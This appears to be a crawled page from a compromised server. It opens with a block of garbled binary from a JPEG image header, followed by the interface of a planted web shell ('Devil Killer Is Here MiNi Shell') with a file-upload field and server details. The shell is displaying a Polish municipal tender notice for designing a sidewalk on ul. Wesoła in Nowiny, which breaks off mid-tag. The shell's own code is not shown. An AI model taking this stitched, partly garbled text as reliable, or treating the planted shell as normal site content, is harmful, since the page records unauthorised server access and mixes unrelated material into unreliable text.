JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250814/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250814/0037593401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przebudowa drogi polegająca na budowie chodnika wzdłuż ul. Wesołej w miejscowości Nowiny. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kobierzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935075</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Pałacowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kobierzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rpzemla@ugk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ugk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi polegająca na budowie chodnika wzdłuż ul. Wesołej w miejscowości Nowiny. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-147a96a9-b81f-4d1d-b585-426b38fcb34f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00375934</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00043828/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.40 Przebudowa drogi polegająca na budowie chodnika wzdłuż ul. Wesołej w m.Nowiny - wykonenie dokumentacji projektowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugk.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ugk.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:Środkiem komunikacji<br/>elektronicznej, służącym komunikacji między Zamawiają-cym a Wykonawcami jest Platforma dostępna pod adresem:<br/>https://ugk.logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym ty-tułem oraz znakiem sprawy zgodnym z niniejszym<br/>postępowaniem. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>2. Instrukcja obsługi platformy w niniejszym postępowaniu dostępna jest na stronie https://ugk.logintrade.net/rejestracja/ w zakładce<br/>INSTRUKCJE pliki: Rejestracja Wykonawcy na Platformie, Zadawanie pytań do postępowania oraz Udział w try-bie podstawowym<br/>bez negocjacji.<br/>3. Wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformie:<br/>Dopuszczalne przeglądarki internetowe:<br/>a) Google Chrome 90<br/>b) Mozilla Firefox 95<br/>c) Opera 78<br/>d) Microsoft Edge 92<br/>Pozostałe wymagania techniczne:<br/>a) dostęp do sieci internet;<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>c) włączona obsługa JavaScript;<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>e) zainstalowany Acrobat Reader;<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środkach dowodowych oraz<br/>innych<br/>informacji, oświadczeń lub doku-mentów, przekazywanych w postępowaniu, przyjmuje się datę ich przesłania<br/>na Platformę.<br/>7. Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach<br/>danych określonych w przepisach wydanych<br/>na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicz-nej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r.<br/>poz. 2452). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: .pdf.<br/>8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Platformy przetargowej.<br/>9. Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych ko-pii dokumentów lub oświadczeń musi być<br/>zgodny z wymaganiami określonymi w roz-porządzeniu Prezesa Rady Ministrów z dnia 31.12.2020r. (DZ.U. 2020 r., poz. 2452) w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicz-nych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w po-stępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>10. Zamawiający nie dopuszcza sposobu komunikowania się z Wykonawcami w inny spo-sób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>11. W razie wystąpienia jakichkolwiek problemów dot. platformy przetargowej prosimy<br/>o kontakt z działem Helpdesk Logintrade: 71 787 37 27,<br/>e-mail: helpdesk@logintrade.net<br/>12. W razie wystąpienia jakichkolwiek problemów dot. platformy przetargowej prosimy<br/>o kontakt z działem Helpdesk Logintrade: 71/787-37-27, e-mail: helpdesk@logintrade.net<br/>Osobą uprawniona do komunikowania się z Wykonawcami jest:<br/>Renata Pietrus- Zemła w sprawach formalnych – e-mail: rpzemla@ugk</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Kobierzyce, Aleja Pałacowa 1, 55-040 Kobierzyce;<br/>2) inspektorem ochrony danych osobowych w Gminie Kobierzyce jest Pan Paweł Eljasiński kontakt: IOD@ugk.pl tel.71/36-98-199;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO (przetwarzanie jest niezbędne do wypełnienia<br/>obowiązku prawnego ciążącego na administratorze w zakresie określonym ustawą z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (Dz. U. z 2023 r. poz. 1605), dalej „ustawa Pzp”) oraz na podstawie art. 6 ust. 1 lit b RODO (przetwarzanie jest<br/>niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której<br/>dane dotyczą, przed zawarciem umowy) w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. &#34;Przebudowa drogi polegająca na budowie chodnika wzdłuż ul. Wesołej w miejscowości Nowiny&#34; RZP.271.19.2025 prowadzonym w trybie<br/>przetargu podstawowego bez negocjacji o wartości<br/>zamówienia nie przekraczającej progów unijnych o jakich stanowi art. 3 ustawy z 11 września 2019 r. - Prawo zamówień publicznych<br/>(Dz.U. z 2023 r. poz. 1605 ze zm.) – dalej „p.z.p.” oraz zawarciem i realizacją umowy w przypadku gdy są zawarte w dokumentach<br/>Wykonawcy z którym zostanie zawarta umowa.4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp, oraz podmioty z zakresu obsługi IT i prawnej Administratora;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania danych zawartych w<br/>dokumentach wybranego Wykonawcy obejmuje cały czas trwania umowy oraz okres przedawnienia roszczeń wynikających z tej<br/>umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) Pani/Pana dane osobowe nie będą przekazywane do odbiorców zlokalizowanych poza Europejskim Obszarem Gospodarczym i<br/>organizacji międzynarodowych<br/>8) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>9) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. pozostałe szczegóły w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.271.19.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla zadania:<br/>„Przebudowa drogi polegająca na budowie chodnika wzdłuż ul. Wesołej w miejscowości<br/>Nowiny” 1. Zadaniem Wykonawcy (przedmiotem zamówienia) będzie zaprojektowanie (wraz z<br/>pozyskaniem wszelkich niezbędnych materiałów / podkładów mapowych / badań /<br/>opracowań / wniosków / odstępstw / warunków technicznych / uzgodnień / decyzji /ZRID/<br/>pozwoleń / zgłoszeń itp.) przedmiotu zamówienia.<br/>Dokumentacja Projektowa zostanie przygotowana na podstawie opracowanej koncepcji<br/>projektowej oraz dokumentów / załączników do których koncepcja projektowa się odwołuje<br/>jak również na podstawie obowiązujących przepisów, norm prawnych oraz wytycznych<br/>Zamawiającego. Wykonana przez Wykonawcę Dokumentacja Projektowa będzie odpowiadać<br/>wymaganiom ujętym w niniejszej koncepcji, dokumentach, do których koncepcja się<br/>odwołuje oraz umowie zawartej pomiędzy Zamawiającym a Wykonawcą.<br/>Dołączona do przetargu koncepcja jest jedynie materiałem poglądowym wskazującym skalę<br/>przedsięwzięcia do zaprojektowania. Projektant winien wykonać dokumentację projektową<br/>zgodnie z obowiązującymi przepisami prawa.<br/>Teren inwestycji położony jest na działkach o numerach ewidencyjnych: 62, 65, 70, 21/5,<br/>21/4, 22/1, 23, 24, 63, 37/1, 36/3, 36/2, 64/2 AM-1, obręb 0016 Nowiny, gmina Kobierzyce.<br/>Jednostka ewidencyjna 022305_2.<br/>2. Szczegółowy zakres prac przedstawiono w załączniku nr 1- Koncepcja projektowa<br/>przebudowy drogi polegająca na budowie chodnika wzdłuż ul. Wesołej w m. Nowiny,-<br/>autorstwa Archiland Robert Szumski.<br/>3. Na etapie realizacji robót budowlanych, w ramach odrębnej umowy należy pełnić nadzór<br/>autorski.<br/>Warunki związane z realizacją zamówienia:<br/>➢ Wykonawca zobowiązany jest do uzyskania niezbędnych do realizacji zamówienia map<br/>podkładowych a także map do celów projektowych, warunków uzgodnień, decyzji,<br/>postanowień, wypisów, wyrysów itp. i dokona płatności za ich uzyskanie. Wykonawca<br/>zobowiązany jest do przeprowadzenia badań geotechnicznych pod budowę w ilości<br/>niezbędnej ( minimum 1 odwiert na 50 mb drogi) do prawidłowego posadowienia obiektu.<br/>➢ Dokumentacja projektowa przed złożeniem wniosku o pozwolenie na<br/>budowę/ZRID/zgłoszenie podlega uzgodnieniu w UG Kobierzyce.<br/>➢ Dokumentacja dotycząca zieleni wraz z instrukcją jej utrzymania w okresie gwarancji<br/>winna uzyskać pozytywne uzgodnienie z Referatu Ochrony Środowiska w UG Kobierzyce.<br/>RZP.271.19.2025-2<br/>➢ Wykonawca zobowiązany będzie do składania w imieniu Zamawiającego związanych z<br/>realizowanym projektem wniosków oraz innych związanych z realizacją zamówienia<br/>dokumentów. Koszty z tym związane winne być ujęte w ofercie Wykonawcy.<br/>➢ Wykonawca opracuje w wersji elektronicznej oświadczenie inwestora o prawie do<br/>dysponowania nieruchomością na cele budowlane załączając komplet uprzednio uzyskanych<br/>dokumentów potwierdzających to prawo.<br/>➢ Wykonawca zobowiązany jest do opracowania(Rozporządzenia Ministra Rozwoju z dnia 11<br/>września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego, (Dz.U. z<br/>2022r.poz.1679 ze zm.) kompletnej dokumentacji projektowo-kosztorysowej wraz z<br/>uzyskaniem wymaganych prawem sprawdzeń, uzgodnień, pozwoleń na budowę i/lub<br/>zgłoszeń dla zadania inwestycyjnego polegającego, zawierającej:<br/>⚫ Projektu architektoniczno-budowlanego oraz projektu zagospodarowania działki lub<br/>terenu (4 egz.),<br/>⚫ projekt techniczny dla każdej z branż(4 egz),<br/>⚫ projekt wykonawczy dla każdej z branż(4 egz.),<br/>⚫ specyfikacja materiałów przewidzianych do wykonania inwestycji z akceptacją<br/>Zamawiającego,<br/>⚫ specyfikacji technicznych wykonania i odbioru robót budowlanych(1 egz.),<br/>⚫ kosztorys inwestorski(1szt) zgodny z Rozporządzeniem Ministra Rozwoju i Technologii z<br/>dnia 20 grudnia 2021 r. w sprawie określenia metod i podstaw sporządzania kosztorysu<br/>inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych<br/>kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. poz.<br/>2458),<br/>⚫ przedmiar robót(1 szt.) zgodny z Rozporządzeniem Ministra Rozwoju i Technologii z dnia<br/>20 grudnia 2021 r. w sprawie określenia metod i podstaw sporządzania kosztorysu<br/>inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych<br/>kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U.<br/>poz.2458),<br/>⚫ ew. inne opracowania niezbędne do realizacji zamówienia, jak np.: inwentaryzacja zieleni,<br/>operat dendrologiczny, badania geotechniczne, projekt organizacji ruchu zastępczego i<br/>RZP.271.19.2025-2<br/><br/>docelowego, operat wodno-prawny, opracowania branżowe, rozwiązania kolizji z istniejącą<br/>infrastrukturą(2 egz. +egzemplarze wymagane przez odpowiednie organy);<br/>⚫ wersja elektroniczna dokumentacji o zawartości niezbędnej dla zamieszczenia ogłoszenia<br/>o przetargu na roboty budowlane oraz kosztorysu inwestorskiego i przedmiaru robót,<br/>⚫ dokonywania aktualizacji uzgodnień, których minął termin. obiektu zieleni wraz z<br/>instrukcją jej utrzymania w okresie gwarancji,<br/>Dokumentację projektową należy przekazać Zamawiającemu także w wersji elektronicznej w<br/>następujących roszczeniach:<br/>− tekst-rozszerzenia doc lub docx oraz pdf<br/>− rysunki-rozszerzenia dwg i pdf<br/>− przedmiar i kosztorys-rozszerzenia ath i pdf<br/>Nazwa pliku powinna odzwierciedlać temat opracowania. Dokumentacja elektroniczna<br/>projektów winna być odzwierciedleniem (skan) dokumentacji projektowej w formie<br/>papierowej z oryginałami opinii, uzgodnień i oświadczeń, itp. Dodatkowo należy zamieścić<br/>na płycie plik w formacie tekstowym o nazwie SPIS zawierający listę plików wraz z pełnymi<br/>tytułami opracowań dokumentacji.<br/>4. Wykonawca zobowiązany będzie do uzyskania ostatecznej decyzji pozwolenia ma budowę<br/>lub dokonania zgłoszenia z klauzulę o braku sprzeciwu wobec planowanych robót lub<br/>ostateczną decyzję ZRID.<br/>5. Dokumentacja powinna być zaopatrzona w wykaz opracowań oraz pisemne oświadczenie,<br/>że jest ona wykonana zgodnie z umową, obowiązującymi przepisami, normami i wytycznymi,<br/>że została wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć i<br/>może być skierowana do realizacji. Wykaz opracowań oraz pisemne oświadczenie o którym<br/>mowa wyżej stanowią integralną część zamówienia.<br/>6. Wykonawca zobowiązany będzie do dokonywania aktualizacji w terminie 14 dni od daty<br/>zgłoszenia przez Zamawiającego kosztorysu inwestorskiego w oparciu o aktualne składniki<br/>cenotwórcze i dostarczenia ich na żądanie Zamawiającego w terminie do dwóch lat od<br/>zakończenia realizacji zamówienia. Wykonawca w wycenie oferty winien uwzględnić<br/>wykonanie trzech takich aktualizacji.<br/>7. Wykonawca zobowiązany jest do pełnienia nadzoru autorskiego w okresie realizacji robót<br/>budowlanych za odrębnym, ustalonym w ofercie wynagrodzeniem oraz na podstawie<br/>RZP.271.19.2025-2<br/>odrębnej umowy. W ramach nadzoru wymagany będzie udział w naradach roboczych,<br/>radach budowy, odbiorach itp. Przewiduje się do 10 wizyt na placu budowy .<br/>8. Wykonawca zobowiązany jest niezwłocznie do odpowiadania na pytania zadawane przez<br/>startujących w przetargu na roboty budowlane, lecz nie później niż w terminie 4 dni<br/>roboczych liczonych od dnia następnego po przekazaniu przez Zamawiającego informacji<br/>drogą elektroniczną.<br/>9. Wykonawca zobowiązany jest do przekazywania na żądanie Zamawiającego pisemnej<br/>informacji o stanie zaawansowania prac.<br/>10. Wykonawca zobowiązany jest do uczestniczenia w spotkaniach konsultacyjnych na<br/>etapie projektowania z udziałem Zamawiającego i przedstawicieli lokalnej społeczności-w<br/>tym Sołtysem i Radnymi Gminy Kobierzyce( ok. 10 spotkań w siedzibie Zamawiającego lub na<br/>terenie planowanej przebudowy). Przed złożeniem wniosku o wydanie pozwolenia na<br/>budowę lub decyzji, projekt podlega uzgodnieniu i akceptacji Zamawiającego.<br/>11. Dokumentacja projektowo-techniczna w zakresie opisu proponowanych materiałów i<br/>urządzeń powinna być wykonana zgodnie z art. 99 ustawy Prawo zamówień publicznych. W<br/>przypadku, gdy dokumentacja projektowo-techniczna wskazuje na pochodzenie (marka, znak<br/>towarowy, producent, dostawca) materiałów i norm, o których mowa w art. 99 ust. 5-6<br/>ustawy, należy dodać zapis, że dopuszcza się oferowanie materiałów i urządzeń<br/>„równoważnych” oraz doprecyzować zakres dopuszczalnej równoważności. Wykonawca<br/>obowiązany jest ,uwzględniając przepisy ustawy-Prawo zamówień publicznych i aktualną<br/>linię orzeczniczą Krajowej Izby Odwoławczej, opisać parametry równoważności, na<br/>podstawie których Zamawiający dokonać będzie mógł oceny zaoferowanych rozwiązań tj.<br/>opisać wymagane cechy jakościowe i techniczne dotyczące ofert równoważnych.<br/>Wykonawca dokonuje tego poprzez wskazanie wymogów precyzujących zakres<br/>równoważnych. Wykonawca dokonuje tego poprzez wskazanie wymogów precyzujących<br/>zakres równoważności ofert np. wskazując, że dany produkt nie może być „cięższy niż…”,<br/>„…do wysokości…”,”o wymiarach nie mniejszych niż… i nie większych niż…” itp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71350000-6 - Usługi inżynieryjne naukowe i techniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 